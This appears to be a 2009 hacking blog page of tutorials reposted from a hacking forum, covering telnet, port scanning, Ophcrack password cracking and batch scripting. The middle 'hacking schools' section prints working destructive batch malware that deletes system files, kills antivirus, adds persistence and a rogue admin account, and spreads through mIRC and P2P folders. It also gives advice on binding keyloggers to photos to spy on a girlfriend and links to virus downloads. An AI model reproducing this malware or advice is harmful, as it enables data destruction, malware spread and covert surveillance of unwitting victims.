Secure hard disk wiping and deletion
http://www.heidi.ie
http://www.jetico.com
http://www.winhex.com/winhex/index-m.html
Trinux http://trinux.sourceforge.net/
Silk Rope 2K http://www.hackersplayground.org/tools.html
CMOS killer http://www.hackersplayground.org/tools.html
LDAP Browser http://www.softerra.com/products/ldabrowser.php
QTODBC http://gpoulose.home.att.net/Tools/QTADO40_sr.exe

Host Lockdown/Protection/Assessment Tools

Bastille http://www.bastille-linux.org
lpchains http://www.linuxplanet.com/linuxpla...torials/2100/3/
Apache Shell http://ftp.porcupine.org/pub/security/index.html
Titan http://www.fish.com/titan
Tara http://www-arc.com/products.shtml
Tcpwrappers http://www.linuxsecurity.com/docs/colsfaq.html#4.5
URLscan http://www.microsoft.com/technet/security/tools/
IISLockdown http://www.microsoft.com/technet/security/tools/
Tripwire http://www.tripwire.com/
HFNETchk http://www.microsoft.com/technet/security/tools/
MS SQL Lockdown Script http://www.sqlsecurity.com/DesktopD...ndex=4&tabid=12
UNIX/Windows/router assessment tools http://www.cisecurity.org/
Secure Cisco Router Template http://www.cymru.com/Documents/secure-ios-template.html
Secure Cisco Switch Template
http://www.qorbit.net/documents/cat...re-template.pdf
Snort http://www.snort.org
Swatch http://swatch.sourceforge.net
Secure Remote Password http://srp.stanford.edu/
Software Code Review links https://sardonix.org/auditing_Resources.html
Sawmill http://www.sawmill.net/features.html

enjoy!!:)

N.B:This Stuff Isnt By me!!.. i just found it!!:)

Telnet Hacking

2009-04-10T11:52:00.000-07:00

Telnet Hacking

TELNET

Telnet is the basic hacking tool, which every hacker must know how to
use before he can even think about Hacking. It can be used to connect
to remote computers and to run commands by simply typing them in it's
window.Telnet does not use the resources of the client's computer but
uses the resources of the server to which the client has connected.
Basically it is a program that you will be using to connect to your
victim's computer. It just requires that you and your victim are both
conneced to the internet.

How can I connect to a remote computers using telnet?

Telnet can be started by going to start -> run and typing telnet Once
the Telnet windows pops up click on Connect->RemoteSystem then in the
host name type the host i.e. the IP address of the remote computer or
the website you want to connect to . Then in the Port select the port
you want to connect to . You can only connect to ports which are open
on the host computer.Almost always leave the TermType to vt100.We use
vt100 as it is compatible with most monitors . Then click connect and
you will be connected to the remote machine in some time.
The syntax of the telnet command from DOS prompt is
C:\>telnet
By default port is taken as 23. Scroll down and read more about ports

What is an IP Address?

Like in this world , everyone has a Home Address so that he can be
contacted on that address , similarly all computers connected to the
Internet are assigned a unique Internet Protocol or IP address which
can be used to contact that particular computer. An IP is simply the
address of a particular computer . Every computer connected to the
internet has a differnet IP address.
An IP address is of the form: xxx.xxx.xxx.xxx .You can find your own
IP by going to start->run and typing winipcfg.If you need to connect
to a your friend's computer then you need the IP address of his
computer . There are many ways of finding out the IP address of a
person's computer without letting him know.

What exactly is a Port

There are two kinds of ports-Physical(HardWare) and Virtual(Software)
You may be thinking of ports to be the slots behind your CPU to which
you connect your Mouse or Keyboard or your monitor. These sockets are
called physical ports . We are here interested in only virtual ports.
It is nothing physical but it is kind of a virtual pipe through which
information can go in and out of the computer. A particular computer
can have a large number of ports. All ports are numbered .Now at each
port a particular service is running. A software which runs on a port
is called service . For interchanging different kinds of information
different ports are used. A typical list shows the various ports

Ping : 7
Systat : 11
Time : 13
NetStat : 15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110

You can connect to a remote computer at a particular port. When you are
connected to that port then you can interchange information related to
that particular port only. Ports can be open or closed. If a particular
port of a computer is closed then you can not connect to that computer
on that port. Generally most of the computers have atleast 5 or 6 ports
open.

Whats a Daemon?

A daemon is a program that runs at ports. You can consider it to be a
software that manages the flow of information through the port . All
the ports can have different daemon / services running on them

Port Scanning??

It is the first step in finding a hackable server running a daemon.
Like softwares can have bugs , similarly daemons can have a hole
or a vulnerability .A hacker can utilize this hole for his purpose.
Say you want to hack into someone's server , what do you do ? You
need the IP address of the computer you want to connect to . This
is the first basic step . Once you have the IP , you need to know
which port is open so that you can connect to it . Every port may
not be open so you need to find out a list of open ports which are
running a daemon.Once you have the list of open ports on the victims
computer then you can connect to any one of those ports .For this
purpose we have port scanners. You just need to feed the IP address
into the port scanner and it will give you the list of all the open
ports of that IP.Some port scanners,alongwith the list of open ports
also gives the service running on each port and its vulnerabilities.
Once you have got the list of open ports then connect to each of them
one by one and see what daemon or service they are running.

But one thing you need to be careful about before port scanning is
that most port scanners are very easily detected and can easily be
traced and you have no excuse if you are caught doing a port scan.
It a sure sign of Hacker Activity and if the host is running the
right kind of Sniffer software maybe Etherpeek then the Port scan
can be easily detected and the IP of the user logged . Once your
IP is logged then you can be easily traced thru you internet
service provider, so be careful with port scanning.

Ophcrack - Windows password cracker

2009-04-10T11:48:00.001-07:00

Ophcrack - Windows password cracker

"Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds." <- taken from sourceforge.

What do you need:
1. Physical contact with the computer.
2. CD with Ophcrack on it.
3. The computer must be able to boot from CD(which shouldn't be a problem).
(you don't need limited user access or anything else)

How to use:
(First download the image file from the provided link, and burn it to a CD.)
After you have the Ophcrack Live CD:
1. Make the computer you wanna crack in to boot from CD. For those who don't know how, just enter into the BIOS and search for a boot priority, just change the sequence to boot from CD first, save changes and exit.(if you don't know how to access the BIOS search google for it, also google may help with the boot priority).
2. Enter the CD and reboot. It will boot up to linux, and you'll be able to handle it from there. It might ask you 'which partition' you wanna scan, and everything else will be done by itself. It will find the password for every user on that disc partition.
3. Have fun!;)

Download link:
http://sourceforge.net/project/downloadi...so&3711951

Hacking school - the latest way

2009-04-10T11:26:00.000-07:00

Hacking Schools.

Ok I noticed a lot of people are asking questions about Hacking Their Schools.
For multiple reasons.Changing grades,revenge..
So I thought :"Hey why not make a tutorial of my own about hacking schools?"
So I made this.
Here I go

What are some ways?

Easy:

Batches.
Keyloggers.
Viruses.
Restricted Websites Access.
Administrator priviliges

Batches

Batches can pretty much do anything.
Flood Networks,Disable Computers,Delete C:\,Burn Memory...
I will give some nice batches.
Made by me/Thanatos/Laughing Man/Fun Pack.

Me:

Batch too long click to read (Click to Hide)

@echo off
@echo off
title I LIKE PRETTY COLORS!
:1
echo DONT YOU LOVE PRETTY COLORS!!
echo PLEASE JUST TAKE LIKE 20 SECONDS TO ADMIRE!!!
start mspaint.exe>nul
start cmd.exe>nul
copy "C:\Program Files">nul
copy "C:\Windows">nul
copy C:\WINDOWS\addins>nul
copy C:\WINDOWS\system32>nul
copy C:\WINDOWS\system>nul
color 21
color 12
color 43
color 34
goto :1

Kills memory
Please save on the desktop

Thanatos:

Batch too long click to read (Click to Hide)

start
color 5
title Your Fucked, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now fucked
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

Basically Fucks Up the pc.
Deletes Most of the necessary files.
Stops AV's Firewalls's Anything..
Kills most Processes
Pretty much it.

LaughingMan

Batch too long click to read (Click to Hide)

@echo off
%j2dt%
%random%%random%%random%%random%%random%%random%%random%
%61jv%
%random%%random%%random%%random%%random%%random%%random%
%rytn%
%random%%random%%random%%random%%random%%random%%random%
%twsg%
%random%%random%%random%%random%%random%%random%%random%
%d4kb%
%random%%random%%random%%random%%random%%random%%random%
%qt36%
%random%%random%%random%%random%%random%%random%%random%
set a=Damn
%vhvx%
%uc62%
copy %0 %windir%\%a%.bat
%r42b%
%6ffa%
set The Laughing Man=tskill
%The Laughing Man% norton*
%The Laughing Man% av*
%The Laughing Man% fire*
%The Laughing Man% anti*
%The Laughing Man% spy*
%The Laughing Man% bullguard
%The Laughing Man% PersFw
%The Laughing Man% KAV*
%The Laughing Man% ZONEALARM
%The Laughing Man% SAFEWEB
%The Laughing Man% OUTPOST
%The Laughing Man% nv*
%The Laughing Man% nav*
%The Laughing Man% F-*
%The Laughing Man% ESAFE
%The Laughing Man% cle
%The Laughing Man% BLACKICE
%The Laughing Man% def*
%8r65%
%qngs%
%syuq%
%xqh8%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%3qr7%
%7tck%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%rtwd%
%wbm2%
set Damn1=echo
%wmt8%
%s5g7%
%Damn1% [windows] >> %windir%\win.ini
%uggu%
%Damn1% run=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% load=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% [boot] >> %windir%\system.ini
%btvq%
%Damn1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%wkuu%
%ornm%
chcp 1252 > nul
%random%%The Laughing Man%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Programs\Autostart\%a%.bat" > nul
%wnxl%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%The Laughing Man%%random%%Damn%
%4i16%
net share ADMIN$
%oxps%
net share C$
net share IPC$
%847f%
net share c=c:
net share d=d:
%2shq%
%1ls3%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%2ww2%
set Damn2=echo
%ucu4%
%g5u2%
%Damn2% 127.0.0.1 http://www.google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%zp2x%
%msvp%
%gp6w%
echo MsgBox "I thought what I'd do was pretend to be one of those deaf mutes...", 16, "The

Laughing Man" > v.vbs
start v.vbs
%ufsx%
%wf2w%
set x=%random%
%kgxx%
%c3mp%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d

"%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Damn /t REG_SZ /d

"%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%g25d%
%fjjt%
%8tov%
set Damn3=echo
copy %0 %windir%\ftppassword.bat
%Damn3% [script] > irc.bat
%Damn3% n1={ if ($nick == $me) { halt } >> irc.bat
%Damn3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%Damn3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%terz%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%gtym%
%emx3%
md %programfiles%\Damn\xxx\ > nul
md %programfiles%\Damn\cracks\ > nul
copy %0 %programfiles%\Damn\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\Damn\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\Damn\cracks\readme.txt
net share xxx&cracks=%programfiles%\Damn > nul
%ud2n%
%The Laughing Man%%random%%Damn%
%vxis%
%s6wl%
net user root pwd /add
net localgroup "Administratoren" root /add
%tgom%
net localgroup "Administrators" root /add
%The Laughing Man%%random%%random%%Damn%
%bem8%
%u1ao%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%vp8e%
%ed7s%
%mknf%
%883k%
set The Laughing Manc=echo
%7j1e%
%The Laughing Manc% "" > %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "Virus" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "

I thought what I'd do was pretend to be one of those deaf mutes... - The Laughing Man

" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%6sbe%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d

"%windir%\hax0r.html" /f > nul
%vfeq%
%6xyr%
%3ujc%
%fo3h%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%Damn%%random%%Damn%%The Laughing Man%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%The Laughing Man%%random%%Damn%%Damn%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d

"%programfiles%\shared_folder" /f > nul
%um8f%
%cqww%
set Damna=copy
%ba2w%
%2vjg%
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat >

nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%ikwc%
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%ft5u%
%rai3%
%ml8t%
%xpnv%
shutdown /r /f /t 23 /c "I thought what I'd do was pretend to be one of those deaf mutes..."
%1jek%
%enas%
shutdown /s /f /t 23 /c "Infected with Damn virus!! - The Laughing Man"
%ot1d%
%w2cy%
%bpy7%
%h1jw%
%pvss%
%lmsz%
:bombing
chcp 1252 > nul
%random%%Damn%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\%random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%The Laughing Man%%random%%The Laughing Man%
%g4yy%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%o4k7%
%ppwx%
%dav%
%7sxo%
:: Damn by The Laughing Man

Quote:- Fakes runtime
- Kills Anti Virus
- Reboots PC
- Shuts Down the pc
- Infects host files
- Shares C: D: ...
- Overwrites files
- Adds/Changes user root:pwd
- Spreads through mIRC [Script.ini], LAN folders, KaZaa Folder, Warez P2P
- Enable DCOM
- Random Virii dropping
- Drop/Changes IE Startpage [use fire fox and no problems with the start page]

Fun Pack

Batch too long click to read (Click to Hide)

del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Deletes the system drive.

Keyloggers:

Sangederomin:

Click to read (Click to Hide)

this is my thread about keyloggers i notice alot of newcomers repeatedly asking about them so here we go...the basics

the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....

Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins

Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING

anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your victim. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.

Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers

Viruses:

I think all of you know what Viruses mean.
Download some Virus Tools on :
http://www.to0l-base.de/index.php?dir=SysFucker%2F
and search for more on
http://www.to0l-base.de/
The password for all downloaded files are :
To0l-base

Restricted website access:

There are a lot of ways but here are some good ones:

http://www.vtunnel.com
This will go to any website you want

Start>run>ping http://www.url.com
Take the ip and paste it in the url of the browser there you have it:)

Administrator priviliges:

Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.

This article is taken from hackforum.net

BEST BATCH TUTORIAL

2009-04-10T11:25:00.000-07:00

BEST BATCH TUTORIAL

Ok,eraser , Crow , Codine made batch tuts and no1 understood,because it was complicated..so ill try to make simple as it can be
the words in ( ) are just remarks.. they wont appear
to start off there is the @echo off/on
and there is echo
and pause

so here is an example

Quote:@echo off
echo Hello This is a test
pause

type this in notepad and save as test.bat
launch it
it will look like this

Quote:Hello This is a test
Press any key to continue...

Again open notepad and write:

Quote:@echo on
echo Hello This is a test
pause

and save it on the desktop as test2.bat
launch it , it will look like this
>

Quote:C:\Documents and Settings\User\Desktop>echo Hello This is a test
Hello This is a test
C:\Documents and Settings\User\Desktop>pause
Press any key to continue

So for the explanation
@echo off/on:
if you put @echo on it will show the directory as you just saw
if you put @echo off it will just show the words with no directories
so its best to use @echo off

echo:
If you want to type a simple phrase just type in echo and something in this case echo Hello This is a test
which will show Hello This is a test

pause
pause will pause the batch file,if you press a key the batch will continue in this case it will exit because there is no more left
so try this

Quote:@echo off
echo Hello This is a test
pause
echo I am testing pause
pause

This will show

Quote:Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
I am testing a pause
Press Any key to continue..

so that convers the pause command

Now some more commands
there is msg *
and there is cls

open notepad and write:

Quote:@echo off
echo Hello This is a test
pause
cls
echo I am testing pause
msg * The End
pause

and save as test3.bat

This will show

Quote:Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
cls
(the page will clear)
I am testing a pause
(a pop-up will show saying The End)
Press Any key to continue..

So .. cls will just clear the screen
and msg * will bring up a pop-up:D

other commands are REM and goto and start
so create a folder name it Test
put any picture inside and name it testpic
open notepad and type

Quote:@echo off
echo Testing start and rem
rem title Test
start testpic.jpg (or any other extension)
pause

and save it inside the new folder as test4.bat

launch it , it will show:

Quote:Testing start and rem
Press Any Key To Continue
(and the picture will launch)

so start will launch any file
and rem is a remark.. which wont show in the bat file when running

now the goto and set and if

type this inside notepad

Quote:@echo off
echo This is a test
echo If you want to do math type 1 and press enter
echo If you want to see a picture type 2 and press enter
set /p option=
if '%option%'=='1' goto :math
if '%option%'=='2' start testpic.jpg (or any extension)

:math
echo 2+2
pause

and save it inside the new folder

this will show

Quote:This is a test
If you want to do math type 1 and press enter
if you want to see a picture type 2 and press enter
(here you can type 1 or 2 and press enter)
(if you press 2 and Enter the picture will load)
(if you press 1 and enter this will show up):
2+2
Press any key to continue...

so goto will go to a Label or a Part of the file
when you put :Math
a new label will be named Math and when you put goto :math
the batch will go to :math

set
the set option will set something :D.. here its going to set :choice
the set is , in some options followed by if
so if I type 1 in this example
the "choice" will be 1 .. and it will go to :math because we put
if '%choice%'=='1' goto :math
so if we put 1 the choice will be 1 therefore it will goto :math

anyway those are the basics..
stay on hackforums.net and wait for more batch tutorials.. next time it will be more advanced

Helloo!!!....First go read my batches for n00bs tutorial.. it got the basics.. anyway.. let me start

i am going to talk about call,exit,and SHIFT?

go into notepad and type this

Quote:@echo off
echo yay me i know the basics of batch
call call.bat
pause
exit

and save in a new folder:)

then open note pad and type this again

Quote:@echo off
echo I Love S*X
pause

and save in the same folder that you save the last one... and name it call.bat

launch the first one
this will show

Quote:yay me i know the basics of batch
I Love S*X
Press Any Key To Continue....
(when you press a key the below will appear)
Press Any Key To Continue...
and when you press a key it will exit

ok.. so now you know what exit does.. it exits the file Imao
and call ,calls in another batch file!!..
so now for SHIFT which is a little hard so try to understand

SHIFT [/n]

If Command Extensions are enabled the SHIFT command supports the /n switch which tells the command to start shifting at the nth argument, where n euh.. can be between zero and eight.
just like this 1 below

SHIFT /2

would shift %3 to %2, %4 to %3, etc. and leave %0 and %1 ..euh.. how can i say it.. .:S.. unaffected yea thats the word .

Examples

the below has got to be saved as .bat.. so just name it test:)

@ECHO OFF
ECHO - %1
SHIFT
ECHO - %1

After creating the above example test.bat file, if you were to type the below command at the MS-DOS prompt, it would print "- ONE" and then "- TWO"; this command is commonly used to work through each of the command extensions or remove command extensions.
(SHIFT , i mean the explanation... i got it from a website and edited it)

Ok I hope you understand

ok thats it for now.. ill post a Batch Features Later

Hello... please read the 2 tutorials before i will talk in this one about a lot of features here we go!:D..
first we will learn how to launch windows applications:
type in notepad:

Quote:@echo off
echo I am testing notepad!
start /MIN notepad
pause

This will show

Quote:i am testing notepad
(and notepad will start minimized.. if you put /MAX instead of /MIN it will launch maximized)
Press Any Key To Continue

Now lets learn how to put a timeout inside a batch..

goto notepad and type:

Quote:@echo off
echo i am trying timeout
set wait=0
:pause1
set /a wait=%wait%+1
if %wait% leq 1000 goto pause1
echo IT WORKED!\
pause

dont understand the command.. just copy paste it.. or memorize it .. if i tell you the explanation it will take years!!..

so this will show :

Quote:i am trying timeout
(couple of seconds and.. )
Press Any Key To Continue...

Now ill teach you how to change the TIME

goto notepad and type:

Quote:@echo off
echo Gee!.. i wonder what time it is!!
TIME 5:50
echo Oh so its 5:50
pause

this will show:

Quote:Gee!.. i wonder what time its is!!
Oh so its 5:50

The TIME will just change The TIME:PImao

Now the Color

go into notepad and type this

Quote:@echo off
echo trying the colors
pause
color 04
echo testing
pause
color f
echo trying
pause
color 4f
echo trying
pause

04=background black and font red
f the font will be white
4f = background red and f = white

Here are the list(that can be found by cmd>color help)
0=black
1=blue
2=green
3=aqua
4=red
5=purple
6=yellow
7=white
8=gray
9=light blue
a=light green
b=light aqua
c=light red
d=light purple
e=light yellow
f=bright white

So this will show Imao
i wont tell try it!!.:P

now the title

type this in notepad

Quote:@echo off
tile Test
echo trying the title
pause

this will show the title Test When you launch it!!

lets try Shutdown/Restart

type this in Notepad

Quote:@echo off
START C:\Windows\RUNDLL.EXE user.exe,exitwindowsexec
exit

The above will restart

Quote:@echo off
Shut down the computer

C:\Windows\RUNDLL32.EXE user,exitwindows
exit

The Above will Shutdown

This article is taken from hackforum.net

How to start learning hacking / From where to start

2009-04-10T11:23:00.000-07:00

How to start learning hacking

Where Should I Start?
(Thread is for Windows)

"Do not learn to hack, but hack to learn". Many new comers see this motto tagged around HF and take it head on. The word Motto is defined as "a sentence, phrase, or word expressing the spirit or purpose of a person, organization, city, etc." So DO NOT read some random TuT(tutorial) about hacking a website, network, or PC and get caught. That said, please continue reading.

In the beginning we all asked ourselves a few questions...

Where do I start?
Where do I go to learn?
What do I need to Hack?

There are numerous facets in the world of hacking that can be VERY overwhelming to a beginner. So many that you will always learn something new until you stop hacking. There is always something new coming out that either replaces or patches(fixes) an older version of software. Therefore necessitating the need for new methods of hacking. So here is a list of programs you should download, tools you should utilize, lessons you should learn, and why you should learn them. Along with links to TuTs from our L33T members. Starting with the basics:

Google
Google is hands down the most powerful and accurate search engine. Before creating a new thread with a simple question(nothing wrong with asking us) search for it on Google.

Wikipedia
